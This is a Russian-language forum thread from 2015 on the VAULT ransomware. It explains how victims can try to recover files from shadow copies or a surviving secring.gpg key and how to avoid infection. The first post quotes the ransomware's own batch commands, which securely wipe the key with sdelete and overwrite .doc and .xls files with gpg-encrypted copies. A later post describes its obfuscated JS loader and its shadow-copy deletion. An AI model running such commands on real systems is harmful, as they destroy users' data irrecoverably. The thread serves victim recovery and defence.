01.04.2015, 18:21 | #1 (permalink) |
Member
Регистрация: 12.07.2011
Сообщений: 31,192
Записей в дневнике: 6
Сказал(а) спасибо: 1
Поблагодарили 21 раз(а) в 7 сообщениях
Репутация: 15348
|
VAULT. Что делать?
Если вам необходимо восстановить документы зашифрованные VAULT, выполните следующие действия: 1. Проверьте наличие теневых копий на дисках, если есть чистые теневые копии, восстановить документы можно без расшифровки. Используйте для работы с теневыми копиями ShadowExplorer если теневые копии отсутствуют, возможно были отключены шифратором, восстановите (на будущее) через настройки защиты дисков резервирование пространства в 5-10% под теневые копии. 2. если теневые и архивные копии отсутствуют, вы можете попытаться самостоятельно выполнить расшифровку документов. для этого необходимо найти файл secring.gpg. secring.gpg(sec key) здесь нужен не любой, не найденный по дороге домой из сетевого форума, а созданный на вашей машине (как правило в %TEMP% юзера) в момент запуска процесса шифрования. Хотя вероятность успешного поиска secring.gpg невелика, поскольку шифратор тщательно затирает данный ключ с помощью утилиты sdelete.exe. Код:
"%temp%\sdelete.exe" /accepteula -p 4 -q "%temp%\secring.gpg" "%temp%\sdelete.exe" /accepteula -p 4 -q "%temp%\vaultkey.vlt" "%temp%\sdelete.exe" /accepteula -p 4 -q "%temp%\confclean.list" что делает шифратор с исходными файлами: Код:
dir /B "%1:\"&& for /r "%1:\" %%i in (*.xls *.doc) do ( echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& rename "%%i" "%%~nxi.vault">> "%temp%\cryptlist.lst" echo %%i>> "%temp%\conf.list" ) т.о. исходный файл не удаляется, а перезаписывается зашифрованным документом с целью невозможности его восстановления. ------- Добавим, что злоумышленники после завершения шифрования оставляют на диске файлы VAULT.KEY и CONFIRMATION.KEY. Первый содержит экспортированный secring.gpg, но зашифрованный с помощью pub key злоумышленников, поэтому расшифровать его на нашей стороне невозможно. В CONFIRMATION.KEY содержится полный список зашифрованных файлов. Оба эти файла оставлены на диске в качестве жеста "доброй, но и злой" воли с целью "протянуть руку товарищеской, но платной помощи" пострадавшему юзеру. -------- если sec key найден (живой и невредимый), вы можете установить GnuPG и GPGShell и проверить возможность расшифровки. скачайте отсюда и установите GnuPG + отсюда можно скачать GPGShell В GPGShell удобно (из контекстного меню) выполнять различные действия над файлами и ключами. + После установки в каталоге так же можно найти подробный мануал (gpg.man) по консольным командам в GnuPG. ----------- как можно избежать встречи с VAULT? 1. будьте предельно внимательны при работе с почтой. если вложенный в сообщение или добавленный по ссылке архив содержит исполняемые файлы *.exe, *.com, *.pif, *.js, *.cmd, *.scr, *.bat, то такой документ никак не может быть офисным документом. Значит вас вводят в заблуждение, выдавая черное за белое. 2. настройте самостоятельно или попросите админа настроить политики ограниченного запуска исполняемых программ из вложенных архивов. например: Код:
XP:%userprofile%\Local Settings\Temp\_tc\*.js Win7:%userprofile%\Appdata\Local\Temp\_tc\*.js 4. Если предварительно положить (и защитить от изменения) известный вам ключ pubring.gpg, то в этом случае шифрование состоится, но известным ключом. Или не состоится. (с), chklst.ru |
2 пользователя(ей) сказали cпасибо: | AlexZir (01.04.2015), Daniellos (01.04.2015) |
01.04.2015, 18:21 | |
Helpmaster
Member
Регистрация: 08.03.2016
Сообщений: 0
|
Скорее всего по этим ссылкам содержится много полезной для вас информации Что делать с УМ-50А? Что делать с плюшкинизмом? И что делать дальше? Что делать с деталями? от нечего делать... |
01.04.2015, 19:42 | #3 (permalink) | |
Member
Регистрация: 12.07.2011
Сообщений: 31,192
Записей в дневнике: 6
Сказал(а) спасибо: 1
Поблагодарили 21 раз(а) в 7 сообщениях
Репутация: 15348
|
что касается GnuPG то он реализован под разные системы:
https://www.gnupg.org/download/ Цитата:
|
|
01.04.2015, 20:25 | #4 (permalink) |
Хозяин Медной Горы
Регистрация: 01.08.2011
Адрес: Армавир
Сообщений: 12,159
Записей в дневнике: 8
Сказал(а) спасибо: 751
Поблагодарили 88 раз(а) в 27 сообщениях
Репутация: 57416
|
В Ubuntu 14.04 GNU Privacy Guard установлен по-умолчанию:
Код:
dan@dan-pc:~/Рабочий стол$ sudo apt-get install gnupg Чтение списков пакетов… Готово Построение дерева зависимостей Чтение информации о состоянии… Готово Уже установлена самая новая версия gnupg. обновлено 0, установлено 0 новых пакетов, для удаления отмечено 0 пакетов, и 0 пакетов не обновлено. Код:
$ sudo apt-get install gnupg |
01.04.2015, 20:37 | #5 (permalink) |
Member
Регистрация: 12.07.2011
Сообщений: 31,192
Записей в дневнике: 6
Сказал(а) спасибо: 1
Поблагодарили 21 раз(а) в 7 сообщениях
Репутация: 15348
|
Daniellos,
для шифрования в Ubuntu наверняка достаточно одного бинарника gpg, как это сделано сейчас в VAULT. он (VAULT) ведь не устанавливает в систему (Win) gpg полностью, а просто копирует шифрующую утилиту gpg.exe в каталог юзера и запускает ее из командного файла |
Ads | |
Member
Регистрация: 31.10.2006
Сообщений: 40200
Записей в дневнике: 0
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 55070
|
21.06.2015, 12:54 | #6 (permalink) | ||||||||
Member
Регистрация: 12.07.2011
Сообщений: 31,192
Записей в дневнике: 6
Сказал(а) спасибо: 1
Поблагодарили 21 раз(а) в 7 сообщениях
Репутация: 15348
|
июньский вариант ВАУЛТ:
Цитата:
схема распространения прежняя: через сообщения в электронную почту, со ссылкой на архив из сети. Архив содержит js в теле которого в закодированной форме (base64) содержатся модули, необходимые для шифрования. раскодировать js с целью анализа исполняемых файлов можно здесь Кодер/Декодер Base64 - Хитрые инструменты для шифрования по прежнему используется gpg.exe v 1.4.18 в упакованном виде (UPX) и переименованным в winlogon.exe Цитата:
Цитата:
схема шифрования файлов прежняя: Цитата:
Цитата:
удаление теневых копий на дисках выполняется с помощью системной утилиты wmic.exe: Цитата:
Цитата:
Цитата:
|
||||||||
Ads | |
Member
Регистрация: 31.10.2006
Сообщений: 40200
Записей в дневнике: 0
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 55070
|
|
|